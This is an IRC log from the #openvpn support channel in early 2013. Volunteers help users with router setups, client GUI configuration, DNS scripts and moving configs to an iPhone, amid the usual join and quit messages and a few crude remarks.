There are folks here that have used openvpn in general with iOS clients though 15:50 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Quit: sam1] 15:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 15:55 -!- ade_b [~Ade@koln-5d815f84.pool.mediaWays.net] has joined #openvpn 15:55 -!- ade_b [~Ade@koln-5d815f84.pool.mediaWays.net] has quit [Changing host] 15:55 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 16:02 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has quit [Ping timeout: 264 seconds] 16:02 -!- dazo is now known as dazo_afk 16:12 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:19 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:22 -!- nickanderson is now known as nickanderson_afk 16:26 < EugeneKay> !notopenvpn 16:26 <@vpnHelper> "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 16:39 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 16:42 -!- MarKsaitis [~MarKsaiti@5e0533a1.bb.sky.com] has joined #openvpn 16:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 16:54 < Devastator> pekster, good evening, when you have the time to take a look, here it is: http://codepad.org/Q2ZncsQB 16:54 <@vpnHelper> Title: Plain Text code - 27 lines - codepad (at codepad.org) 16:54 < Devastator> thanks in advance for this 16:58 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 17:11 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 17:51 -!- nickanderson_afk is now known as nickanderson 17:51 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 17:52 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 17:53 -!- nickanderson is now known as nickanderson_afk 17:53 -!- 
nickanderson_afk is now known as nickanderson
17:55 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection]
17:59 -!- emmanuel__ [~emmanuelu@94.23.150.162] has joined #openvpn
18:00 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Quit: emmanuelux]
18:00 -!- emmanuel__ [~emmanuelu@94.23.150.162] has quit [Read error: Connection reset by peer]
18:05 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer]
18:07 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving]
18:09 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn
18:14 -!- nickanderson is now known as nickanderson_afk
18:17 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer]
18:17 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
18:17 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
18:17 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
18:18 -!- mode/#openvpn [+o krzee] by ChanServ
18:19 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn
18:21 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Quit: No Ping reply in 180 seconds.]
18:21 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
18:23 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
18:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
18:27 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 264 seconds]
18:51 -!- nickanderson_afk is now known as nickanderson
19:03 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn
19:04 -!- raidz is now known as raidz_away
19:04 < mattwj2002> community edition?
19:04 <@ecrist> what?
19:05 < mattwj2002> what is the free version like?
19:05 <@ecrist> are you an AS user?
19:05 <@ecrist> !as
19:05 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
19:05 < mattwj2002> actually not yet
19:06 <@ecrist> AS has a nice GUI/web page
19:06 < mattwj2002> I just wanted to know how hard the open source version is
19:06 <@ecrist> the open-source version requires you create a config with a file
19:06 <@ecrist> it's not that hard, as long as you're not retarded
19:06 < mattwj2002> :)
19:06 <@ecrist> !howto
19:06 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
19:07 < mattwj2002> no paying per user?
19:07 <@ecrist> nope
19:07 < mattwj2002> sweet
19:07 < rob0> Free software is never like that.
19:08 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
19:08 < mattwj2002> good point
19:08 < mattwj2002> or connection whatever
19:08 < mattwj2002> :)
19:17 -!- cosmicgate [~root@94.249.242.85] has joined #openvpn
19:17 -!- cosmicgate is now known as Guest20058
19:21 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has left #openvpn []
19:24 -!- MarKsaitis [~MarKsaiti@5e0533a1.bb.sky.com] has quit [Ping timeout: 260 seconds]
19:26 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn
19:26 -!- nickanderson is now known as nickanderson_afk
19:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds]
19:44 -!- nickanderson_afk is now known as nickanderson
19:44 -!- Guest20058 [~root@94.249.242.85] has quit [Ping timeout: 248 seconds]
19:53 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Read error: Connection reset by peer]
19:54 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
19:55 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Client Quit]
20:02 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
20:08 -!- NuclearMeltdown is now known as UNFLUORIDATED
20:13 -!- UNFLUORIDATED is now known as UnFluoridated
20:17 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
20:17 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
20:27 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
20:48 < cirdan> hey i setup openvpn tap on dd-wrt. It works great accessing my LAN but when I try to push all traffic over the vpn I can't get past my main router. lan is 10.0.0.0 vpn is 10.0.4.0 I thought I put the right iptables line in to mask the connection but maybe not.
20:50 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
20:57 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection]
20:58 < cirdan> ah nevermind. the howto fixed it :-)
21:12 -!- [p0rk] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn
21:14 -!- erry [erry@freenode/staff/erry] has quit [Read error: Operation timed out]
21:14 -!- erry [erry@freenode/staff/erry] has joined #openvpn
21:14 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Read error: Operation timed out]
21:15 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Read error: Operation timed out]
21:15 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn
21:15 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
21:15 -!- [WDKevin] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds]
22:31 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!]
22:43 -!- nickanderson is now known as nickanderson_afk
23:03 -!- UnFluoridated is now known as NuclearMeltdown
23:08 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
23:28 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 264 seconds]
23:30 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
23:34 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 248 seconds]
23:42 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
23:42 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn
23:44 -!- Guest20058 [~root@94.249.242.85] has joined #openvpn
23:46 < md_5> Is there a way I can make openvpn do this: 10.0.0.1 connects to port 1234 on server 11.0.0.0.. 11.0.0.0 forwards to 12.0.0.0:1234 . The application on 12.0.0.0:1234 transparently sees the connection as coming from 10.0.0.1
23:47 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 244 seconds]
23:55 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
23:59 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 252 seconds]
--- Day changed Sat Feb 09 2013
00:02 -!- Devastator [~devas@unaffiliated/devastator] has quit []
00:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
00:06 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
00:08 -!- rych [~root@94.249.242.85] has joined #openvpn
00:10 -!- Guest20058 [~root@94.249.242.85] has quit [Ping timeout: 248 seconds]
00:12 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
00:14 -!- Guest20058 [~root@94.249.242.85] has joined #openvpn
00:16 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 240 seconds]
00:17 -!- rych [~root@94.249.242.85] has quit [Ping timeout: 248 seconds]
00:18 -!- Guest20058 [~root@94.249.242.85] has quit [Ping timeout: 248 seconds]
00:18 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn
00:20 < lickalott> gents, following this guide -
http://www.serverwatch.com/tutorials/article.php/3924556/Setting-Up-a-VPN-Server-on-a-Tomato-Router-Part-2.htm but the version is different so not all the settings are lining up. Does anyone know of a different/better guide?
00:20 <@vpnHelper> Title: Setting Up a VPN Server on a Tomato Router, Part 2 (at www.serverwatch.com)
00:20 < lickalott> I can't get the service to start
00:22 < pekster> The supported configuration guide is:
00:22 < pekster> !howto
00:22 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
00:23 < pekster> Most folks here don't like dealing with frontends since that's the responsible of the person/group maintaining it to support. If tomato web config isn't working, you should ask them why. The openvpn program loads settings from a configuration file and command-line arguments
00:23 < pekster> responsibility*
00:23 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
00:25 < lickalott> I think it is more of a stupidity thing (on my part) than a "not working" thing on theirs... Figured I'd come to the masters. I'll see if they have anything to say, but the last 4 times I've posted in that chan i got no responses. Thanks for the assist though.
00:26 < pekster> No idea what you mean "the version is different and not all the settings are lining up"
00:27 < pekster> We can help if you post your openvpn settings. That guide doesn't show me any VPN settings, or yours specifically; obviously troubleshooting your issue requires knowing how *your* system is set up, what's not working, what you've tried, and configs/logs for your setup
00:27 < pekster> The howto link above tells you how to use OpenVPN. If you want to use something that "makes openvpn work automagically for you" this isn't the place for that. Something about "teach a man to fish..."
00:28 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 256 seconds]
00:31 < lickalott> copy all
00:31 < lickalott> wasn't looking for a hand out. just an up to date tut on configuring.
00:32 < lickalott> the link i posted must've come from an older version of tomato with openvpn embedded in the FW. the screenshots don't match up to what my router page is showing.
00:32 < pekster> Yea, I get that. The problem is frontends and GUI tools have a way of hiding what's actually going on. That makes it borderline for those of us that deal with the actual openvpn project to know what's wrong, and we have better things to do than learn how every tool someone wrote works. Many of them work poorly to boot
00:33 < pekster> Logs would be a great place to start if the service fails to start
00:33 < pekster> !logs
00:33 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
00:34 < lickalott> gotcha. Lemme mess around more; if i get stuck I'll know how to provide the right questions and where to go. :D
00:37 -!- Aegela [~Aegela@180.249.40.39] has joined #openvpn
00:39 -!- Aegela [~Aegela@180.249.40.39] has left #openvpn []
00:40 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
00:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
00:45 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
00:48 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
00:51 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has quit [Quit: leaving]
01:10 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
01:12 < lickalott> k...
I'm back pekster - http://pastebin.com/XtrqYze4
01:12 < lickalott> the service tries to start but seems to get denied.
01:13 < lickalott> I've forwarded the port. put all the keys in where they need to go and believe all the settings are correct.
01:13 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
01:14 < lickalott> oh..and ensured NTP was set to North America
01:16 < pekster> That's missing log details prior to the first line. That said, the process exits on line 16 of that output by an interrupt signal. Either something sent openvpn a signal to exit, or one of the options to exit was met
01:18 < pekster> Oh, I see, you just had a trailing line from earlier log output; line 1 isn't from that invocation
01:18 < lickalott> prior to the first line was all failures because I didn't have the correct .pem
01:19 < lickalott> I updated the time and set the NTP then I rebooted and the service is started now. but i'm getting this - Unable to obtain Session ID from 192.168.1.1:1194: XML-RPC: ConnectionRefusedError: 10061: No connection could be made because the target machine actively refused it..
01:20 < lickalott> is this something I can test from within the network? i have a DNS that I tried but got the same result
01:20 < pekster> The errors you just listed aren't from openvpn
01:20 < pekster> So, no clue
01:20 < lickalott> they came from the client
01:21 < lickalott> after authentication that error popped up
01:22 < pekster> OpenVPN does not use XMP-RPC or write to the log about obtaining a "Session ID"
01:22 < pekster> XML-RPC*
01:22 < pekster> Don't even worry about the client until your server starts up properly and doesn't exit 4 seconds after it starts
01:24 < lickalott> I think I'm there.
I now show General Statistics and maxbcast/mcast queue length 0 on the status tab
01:24 < lickalott> emphasis on think
01:25 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
01:25 < lickalott> http://tinypic.com/r/1tokyc/6
01:25 <@vpnHelper> Title: Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting (at tinypic.com)
01:26 < pekster> Apparently that's "Access Server" which isn't supported here; that's a commercial VPN product and supported by the commercial support team that runs it. If you use the open-source openvpn platform, you must use the open-source client
01:26 < pekster> !download
01:26 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
01:26 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
01:27 < pekster> Also, I just looked up that code, and the logs actually look okay (I mixed up the codes, and that's just to query the list of connected clients, so, the server is at least starting up successfully)
01:27 < lickalott> Ahhhhh
01:29 < lickalott> downloading now.
01:30 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
01:35 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out]
01:38 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
01:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
01:51 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn
01:55 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
02:00 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
02:01 < lickalott> well that sucked...
02:01 < lickalott> tried to setup the client side and lost the router.
02:03 < pekster> "lost the router" ?
02:09 < lickalott> unresponsive
02:09 < lickalott> had to reset it to get it back.
02:09 < lickalott> no biggie
02:09 < lickalott> i do have one more question, then I'll leave it alone for the night.
02:09 < lickalott> how can I clear the server list cache in the client GUI?
02:11 < pekster> You mean the Windows tray icon "OpenVPN GUI" program?
02:11 < lickalott> yes
02:12 < pekster> That's not a cache; it shows you configuration files at its reference location, by default \config\
02:13 < pekster> If you have only one it gives you commands to interact with it; if you have >1 it shows you a list, each of which can independently interact with that configuration
02:13 < lickalott> you, my friend, are an animal. Thanks for all your time!
02:18 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
02:18 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
02:18 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
02:19 < lickalott> only file in that path is key.txt
02:21 < pekster> Then the GUI will have no knowledge of any configurations to use (IIRC, it might not refresh its view of available config files without a restart)
02:21 < pekster> Of the tray icon GUI application, not of your PC, to clarify
02:22 < lickalott> already did that. no change.
02:22 < pekster> Then it shouldn't show you any "connect" option (or maybe it does and is greyed out, I forget)
02:23 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds]
02:27 -!- Greek-Boy [~Greek-Boy@41.138.223.38] has joined #openvpn
02:28 -!- Greek-B0y [~Greek-Boy@41.138.223.38] has joined #openvpn
02:31 -!- Greek-Boy [~Greek-Boy@41.138.223.38] has quit [Ping timeout: 244 seconds]
02:32 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
02:36 -!- jtrucks_ [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn
02:36 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 246 seconds]
02:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
02:40 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Ping timeout: 630 seconds]
03:11 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out]
03:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds]
03:18 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
03:23 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 264 seconds]
03:24 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
03:30 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
03:30 -!- mode/#openvpn [+o krzee] by ChanServ
03:36 -!- Greek-Boy [~Greek-Boy@41.59.27.19]
has joined #openvpn
03:38 -!- Greek-B0y [~Greek-Boy@41.138.223.38] has quit [Ping timeout: 256 seconds]
03:45 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 260 seconds]
03:53 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
03:58 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds]
04:09 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
04:10 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
04:10 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
04:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
04:23 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
04:25 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn
04:27 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 272 seconds]
04:28 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
04:31 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn
04:34 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
04:38 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds]
04:58 -!- hive-mind [pranq@mail.bbis.us] has joined #openvpn
04:58 -!- hive-mind [pranq@mail.bbis.us] has quit [Changing host]
04:58 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
05:00 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has joined #openvpn
05:00 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has quit [Changing host]
05:00 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
05:02 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
05:03 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
05:09 -!- gallatin [~gallatin@dslb-084-058-111-165.pools.arcor-ip.net] has joined #openvpn
05:17 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 624 seconds]
05:18 -!- hive-mind
[pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds]
05:25 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 264 seconds]
05:29 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn
05:32 -!- erry_ is now known as erry
05:44 -!- Greek-Boy [~Greek-Boy@41.59.27.19] has quit [Ping timeout: 256 seconds]
05:49 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
05:54 -!- erry [erry@freenode/staff/erry] has quit [Remote host closed the connection]
05:54 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
05:56 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn
05:58 -!- gallatin [~gallatin@dslb-084-058-111-165.pools.arcor-ip.net] has quit [Quit: Client exiting]
06:02 -!- yuri__ [~cek@78.26.128.206] has joined #openvpn
06:02 < yuri__> test
06:02 < yuri__> looks like resolvconf doesn't add nameserver when ip-up.sh is run:
06:03 < yuri__> + /sbin/resolvconf -a tun0 + printf '# Generated by openvpn for interface tun0\nnameserver x.x.x.x\n' BUT right after that line I see that no iface was added:
06:03 < yuri__> + resolvconf -i
06:03 < yuri__> wlan0
06:05 < yuri__> here's what i'm getting: https://gist.github.com/celesteking/b97cfc37853305604920
06:05 <@vpnHelper> Title: gist:b97cfc37853305604920 (at gist.github.com)
06:06 -!- cek [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds]
06:06 -!- erry [~erry@freenode/staff/erry] has joined #openvpn
06:09 -!- erry [~erry@freenode/staff/erry] has quit [Read error: Connection reset by peer]
06:09 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn
06:11 -!- Mimiko [~Mimiko@89.28.88.177] has quit []
06:12 -!- erry_ is now known as erry
06:12 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
06:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds]
06:18 -!- erry [erry@freenode/staff/erry] has quit [Remote host closed the connection]
06:23 -!- Mcloven-[Mobile] [~richard@49.176.3.80] has
joined #openvpn
06:34 -!- erry [erry@freenode/staff/erry] has joined #openvpn
06:35 -!- erry [erry@freenode/staff/erry] has quit [Read error: Connection reset by peer]
06:35 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn
06:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
06:38 -!- yuri__ [~cek@78.26.128.206] has quit [Ping timeout: 276 seconds]
06:41 -!- erry_ is now known as erry
06:41 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
06:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
06:44 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
06:48 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 246 seconds]
06:50 -!- Mcloven-[Mobile] [~richard@49.176.3.80] has quit [Ping timeout: 276 seconds]
06:50 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
06:50 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn
06:55 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 245 seconds]
06:55 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Max SendQ exceeded]
06:58 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn
06:59 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
06:59 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host]
06:59 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
06:59 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 276 seconds]
07:03 -!- master_of_master [~master_of@p57B520BD.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
07:04 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 255 seconds]
07:04 -!- master_of_master [~master_of@p57B5480E.dip.t-dialin.net] has joined #openvpn
07:05 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
07:10 -!- hive-mind [~hivemind@unaffiliated/contempt] has
quit [Remote host closed the connection]
07:11 -!- yuri__ [~cek@78.26.128.206] has joined #openvpn
07:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
07:22 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
07:24 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
07:26 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has joined #openvpn
07:26 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has quit [Changing host]
07:26 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
07:27 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 260 seconds]
07:30 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
07:32 <@novaflash> ecrist, EugeneKay: http://9gag.com/fast#6538384 (yeah i know, 9fag, whatever, but it's funny)
07:32 <@vpnHelper> Title: 9GAG - Fast (at 9gag.com)
07:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
07:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
07:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
07:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection]
07:53 < EugeneKay> No.
07:58 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
07:59 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds]
08:02 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection]
08:03 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn
08:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
08:06 -!- Guest11768 [~root@94.249.242.85] has joined #openvpn
08:11 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 246 seconds]
08:12 -!- Mcloven-[Mobile] [~richard@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
08:14 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has joined #openvpn
08:14 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has quit [Changing host]
08:14 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
08:23 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
08:23 -!- mode/#openvpn [+v s7r] by ChanServ
08:24 -!- yuri__ [~cek@78.26.128.206] has quit [Ping timeout: 276 seconds]
08:25 -!- Mcloven-[Mobile] [~richard@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving]
08:30 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
08:32 -!- funyun [~funyun@cpe-65-25-103-89.neo.res.rr.com] has joined #openvpn
08:34 < funyun> hi. someone here helped me setup a vpn. i have 4 files in a tblk for tunnelblick. ca.crt client.ovpn client1.crt and client1.key. it works fine on my computer but now i want to set up openvpn on my phone. it tells me to zip my config files and add them to the app. but they're not working. can anyone help me?
08:35 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds]
08:36 <@plaisthos> funyun: which phone?
08:36 < funyun> plaisthos: iphone
08:36 < funyun> 5
08:36 <@plaisthos> sorry I pass
08:37 < funyun> plaisthos: it's not a phone problem.
it's more of a problem with me not knowing what config files go where
08:37 < funyun> i'm a noob
08:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
08:39 < funyun> anyone else care to help? any help is greatly appreciated
08:40 -!- Guest11768 [~root@94.249.242.85] has left #openvpn []
08:40 -!- gagaprince [~root@94.249.242.85] has joined #openvpn
08:41 < gagaprince> put all those files in the same folder
08:41 < rob0> um, "where the config files go" depends on things like how the OS or user interface starts the VPN
08:42 < rob0> If you have a command line and a config file, you run it as such: "openvpn configfile". The "configfile" then says where to find the other files.
08:42 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
08:44 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
08:44 <@plaisthos> funyun: Yes. But I have absolutely no clue of the iOS stuff so I cannot help you there
08:44 < gagaprince> embed everything into the ovpn file
08:44 < gagaprince> problem solved
08:44 <@plaisthos> funyun: my guess is that you can !inline all config and email it to yourself
08:45 <@plaisthos> !inline
08:45 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
